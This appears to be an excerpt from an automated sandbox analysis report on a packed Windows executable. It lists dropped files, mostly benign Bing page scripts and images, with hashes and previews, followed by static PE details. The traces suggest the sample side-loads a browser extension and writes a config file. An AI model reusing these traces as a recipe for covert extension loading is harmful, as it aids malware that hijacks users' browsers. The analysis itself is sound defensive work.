                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\a7s5nizZY8lKJ6VMCdSRJA2buHw.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (412), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                        Entropy (8bit):5.17305928357574
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2QBdoySw+YEXj3Gs07fZVD7H82MgNukm7UqgU:2Qb7+YEXz4fZxHjmoRU
                                                                                                                                                                                                        MD5:581C2C396720F651CC2F3D40E9E727F8
                                                                                                                                                                                                        SHA1:6515C6C20730DCF81A861EA8D16682AAC4DDA273
                                                                                                                                                                                                        SHA-256:D6787BD009EA758F8ABDD437032799F7004247FC10F631B93AF0FA84607597EC
                                                                                                                                                                                                        SHA-512:E7198C04B0E8CEE80B8278E77FA0C301915B32F62C0DB36C1D7D2D9E20A7ACD578308070EB833ED8450A2360358E118E55B47DB149FB4AB8053E8FAA2C925568
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(){var i,t,r;if(n&&Lib.CssClass.contains(n,"b_active"))try{i=_ge("b_header");i.scrollIntoView({behavior:"smooth"});t=_ge("sb_form_q");t.focus();t.click();r=t.value;t.setSelectionRange(0,r.length)}catch(u){_w.sj_log&&sj_log("CI.WebScope","error",u.message)}},!0)})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cJksCHwhB_Z32I0ytWPMUDsybak.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):226
                                                                                                                                                                                                        Entropy (8bit):4.923112772413901
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                                                                                                                        MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                                                                                                                        SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                                                                                                                        SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                                                                                                                        SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dbmNS45xQvD1diApY1T2HExvOo8[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4934
                                                                                                                                                                                                        Entropy (8bit):7.782095567670307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                                                                                                                        MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                                                                                                                        SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                                                                                                                        SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                                                                                                                        SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\hjhfd1k8QFxRGOj4kh67VzVClLA.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5961), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5961
                                                                                                                                                                                                        Entropy (8bit):5.432641972148736
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9jaZQZ13PJOQU88YQCNsdeEjhjSCnSA1y2A1Qnyoy+y25syeOWNKo5xpzlVUILjI:paWT3REjhNn5y1Myoy+y25syZWNKo5xA
                                                                                                                                                                                                        MD5:8BE63544771E19931F22DB03D5212B87
                                                                                                                                                                                                        SHA1:86A4518FBB87B707713234D6F41AED3642CC46FD
                                                                                                                                                                                                        SHA-256:4DD9F4B2714212665842874D337CD76474D1A9DE81BC7388AE0828E04624CF17
                                                                                                                                                                                                        SHA-512:EFF45BEE81D00E1D69BB6F937F557928438E284C8C0E4D7A67FC711FDE114CA460901D5F242C682BD0453A188F96B6AF68FDED48514023BF893568A6633743D9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\hx-eea1zqtCz4K0bW2uH_oN7Fs4[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3791
                                                                                                                                                                                                        Entropy (8bit):7.08266375441937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                                                                                                                        MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                                                                                                                        SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                                                                                                                        SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                                                                                                                        SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kFdRGnsF9oNJsnfvt_bKFj-yBxg.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                        Entropy (8bit):5.098203134109495
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                                                                                                                        MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                                                                                                                        SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                                                                                                                        SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                                                                                                                        SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\microsoft.b109cceab5e009228460[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65448)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):94707
                                                                                                                                                                                                        Entropy (8bit):5.407635683386335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:GSqLAEwLuZAFL1oL3SDk5v1VWkNWPEYydLLnnS+7ySGAEMbiYnRGwVKVt+RFVDh4:GJMCUCuW3WkNtnnDGgGwVKWklyGEQ
                                                                                                                                                                                                        MD5:AA2BEDDF57312EF1CD312880E2729EBA
                                                                                                                                                                                                        SHA1:8E53B59585F8C947924355AFDC72A62E27CD001C
                                                                                                                                                                                                        SHA-256:16933DCF75634F75F0A09A67FB0FF7D9D0556188A888CDD89E05F2D21997BB51
                                                                                                                                                                                                        SHA-512:64AC2CCE15619DA127C5F1B637BBB39C1EB3DB69DE30FB690863C7390EC0A6D0BA2BEE9B9BC20DFF2B4044D17CED483CE5294E624F792652E8E4E1AD6FFAD4DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*! For license information please see microsoft.b109cceab5e009228460.js.LICENSE.txt */."use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["microsoft"],{39115:function(n,e,t){t.d(e,{Z:function(){return M}});var r=t(68897),i=t(44611),o=t(89734),u=t(98693),a=t(38629),c=t(64648),f=t(73966),s=t(64973),l=t(26105),d=t(46540),v=500,p="Channel has invalid priority - ";function g(n,e,t){e&&(0,f.kJ)(e)&&e[c.R5]>0&&(e=e.sort((function(n,e){return n[s.yi]-e[s.yi]})),(0,f.tO)(e,(function(n){n[s.yi]<v&&(0,f._y)(p+n[c.pZ])})),n[c.MW]({queue:(0,f.FL)(e),chain:(0,l.jV)(e,t[c.TC],t)}))}var h=t(27218),m=t(24200),y=t(92687),b=t(28055),S=function(n){function e(){var t,r,a=n.call(this)||this;function l(){t=0,r=[]}return a.identifier="TelemetryInitializerPlugin",a.priority=199,l(),(0,i.Z)(e,a,(function(n,e){n.addTelemetryInitializer=function(n){var e={id:t++,fn:n};return r[c.MW](e),{remove:function(){(0,f.tO)(r,(function(n,t){if(n.id===e.id)return r[c.cb](t,1),-1}))}}},n[s.hL]=fu

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\search[1].htm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (48370), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):202940
                                                                                                                                                                                                        Entropy (8bit):5.621049198249498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:kqQQ1tfmDR5zQ9oEYZ5YN/FIClBgM4ASRBpMGDcUly:LQQ1t+DRZzpzw/DBgOvGDc7
                                                                                                                                                                                                        MD5:F43BF2F6193E42D25ED382DE22C9E439
                                                                                                                                                                                                        SHA1:3A3A613836FBA7A502E4F42264A72FA4893F115C
                                                                                                                                                                                                        SHA-256:B1B3C8A72E6D28C4B53695FB6BE99FEAEB691C916869F060211DE424549B58A1
                                                                                                                                                                                                        SHA-512:DBA259F14D32987DA6A6A7977831E221AD201B3B4BC7E3EF1D831CF32FBDC1C1A4C39899E24FDE55EBED184585C92C7F9416C15F67E3269F69495F1FFC5BB846
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript" nonce="GEk4O+lodiYXkJfrZr+ztQWSMpLFg9N3i8ZCQdW6b+4=" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>--disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --load-extension=C:\Windows\crx - Search</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="msapplication-TileImage" content="/sa/simg/bing_p_hd.png" /><meta name="msapplication-TileColor" content="#0C8484" /><meta name="SystemEntropyOriginTrialToken" content="A1L3tx5CzccqjN3lK6st/fXMwhf9EeokCPf8XCt0DVI8JPbg37BWq0zKvlqgkdm8YEUbthoGkC/xdR1+iIz4txAAAABxeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiTXNVc2VyQWdlbnRMYXVuY2hOYXZUeXBlIiwiZXhwaXJ5IjoxNzM5NzI0MzExLCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" http-equiv="origin-trial" /><meta property="og:

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\uk_UtgpS3Vx82_2KByeueWFHn_Q.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4646), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4646
                                                                                                                                                                                                        Entropy (8bit):5.223823464776493
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:/MVnaRENlgVWIjomiJesPbrtwyAZBd3nxEd7NBu:/CaRENlgVMJhPbrtwyGBdnxEd7NI
                                                                                                                                                                                                        MD5:9EED9C1E6E746CFE4DD9E899F06C3E11
                                                                                                                                                                                                        SHA1:F25299247D020578CA0C30DC738552036819663E
                                                                                                                                                                                                        SHA-256:39AD6BE13A6186BF011C53610C13EE0FD4E9AD51CC28BF49B8FA815CBDC47E8E
                                                                                                                                                                                                        SHA-512:3088F428B747D659EB4C0385830E4B3FA95C9269427A49B2695C9C082429605A8F3FB694CF3B0690280E9D1ACBF862597CEAEDB91945BAF70F60900AA919CCCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vendors.290823e0e7160e8e5303[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (44387), with NEL line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):194844
                                                                                                                                                                                                        Entropy (8bit):5.419132326845799
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:oSYgu0Mj/PJ3floxEsQtzbwDZ777/3DwLps0p:oSYguVJvSa5+Z7uOE
                                                                                                                                                                                                        MD5:1C8B7CFD513B7ECA52BA64947CEE70E4
                                                                                                                                                                                                        SHA1:6BA3FBE2E7514E981EB68E9A92E9EA7A499CCC0C
                                                                                                                                                                                                        SHA-256:D1730E14E7E3D2362E6C5FF0C9C36E08660F87317EC44551FAED419263240F2C
                                                                                                                                                                                                        SHA-512:1F6567D3870CFBE002CD447135020C9F1319DFAB76E3CEAFE4C62BDD79F78F2AB3E5958DE9E068A3937E1C469978FC2E4A56015B82E06FE1377A78B47D1B06DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["vendors"],{29558:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},74322:function(t){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},25135:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t)&&null!==t)throw TypeError("Can't set "+String(t)+" as a prototype");return t}},6664:function(t,e,r){var n=r(23362),o=r(35093),i=r(79549),a=n("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},99027:function(t,e,r){var n=r(58306).charAt;t.exports=function(t,e,r){return e+(r?n(t,e).length:1)}},57699:function(t){t.exports=function(t,e,r){if(!(t instanceof e))throw TypeError("Incorrect "+(r?r+" ":"")+"invocation");return t}},45150:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t))throw TypeError(String(t)+" is not an object");return t}},60410:function(t){t.exports=

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF0C82635135466ACB.TMP

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.3613836054883338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                                                        MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                                                                                                        SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                                                                                                        SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                                                                                                        SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DF258EEC8E43A49788.TMP

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.3613836054883338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                                                        MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                                                                                                        SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                                                                                                        SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                                                                                                        SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\GlobalMgr.db

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):190
                                                                                                                                                                                                        Entropy (8bit):4.511104462581999
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LDIdyGK3Mp9AUEvCSdD+Z8BGMbAGTY2UpBHeVKLDMJQn4U9VTcYDUhQreKvRiQGU:3T8iUbSQGj82UvHegOxUgYDUQpG5gz
                                                                                                                                                                                                        MD5:8FC8760C489E4AA580E6A197325D7D40
                                                                                                                                                                                                        SHA1:6F19E7AAB7F94C6E1EB05432DE5CE4CEF90334E8
                                                                                                                                                                                                        SHA-256:AE04FD367F249A18E3764200D60C6A18A525C1D99BB5C0A9683B6C37B48B4CAD
                                                                                                                                                                                                        SHA-512:A74AF085196B238F99C7D578271A00537C58A9AA57145179585A3E3E259162C95C094D26C1650262F2E8387FCFBC246141B77BBE291B6B8EA754CBC8B5D5F81E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:[Profile]..config1=102e1490f0604c078f675cf9899bc6e6..config2=c75a6d6f209a4f9c616f095dc76f8b89..config3=29f59366511ef064441d7b0e5b68c197..config4=1b3d82ff206f2697db14bb5ee90b3a8d..config5=1..

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                        Entropy (8bit):7.889040863631203
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:nv8401986_110422.exe
                                                                                                                                                                                                        File size:668'064 bytes
                                                                                                                                                                                                        MD5:31549917cdc6e3f9d40a48ea5998493f
                                                                                                                                                                                                        SHA1:c0f7e826645b1ba2ba1fed866992beb9de7a31df
                                                                                                                                                                                                        SHA256:73f03b369e9df60c2dc97baefcdc4ba920da3a2126c873a4654e1a83510d3b87
                                                                                                                                                                                                        SHA512:709737c36ef4fe96e99dcac210854a760cbbcff7af428620a0a83f16a5db09af4dbe2b52ccd4cff08fe0d5d4e544ddd9474c7c45005938a32705960c3581dad1
                                                                                                                                                                                                        SSDEEP:12288:pC6wyk1nvfBP0FQoOd/566f81qjbravk7o3xLWAB8TMfo+aqwFtaif8dHOqPNspj:pC6wp1vfhboOb66Uyavk8hdo+g8BOONu
                                                                                                                                                                                                        TLSH:78E42231EAA94801F21BCD367951C6B22878FC44D3D1920B63DCBF67ABBA711513876E
                                                                                                                                                                                                        File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$......._.d..............3.......3.......3..;...........I...............I...K...I...8...............8...............G.......Q.......C..

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x5a4c40
                                                                                                                                                                                                        Entrypoint Section:UPX1
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x618CFCC6 [Thu Nov 11 11:21:42 2021 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                        Subsystem Version Major:5
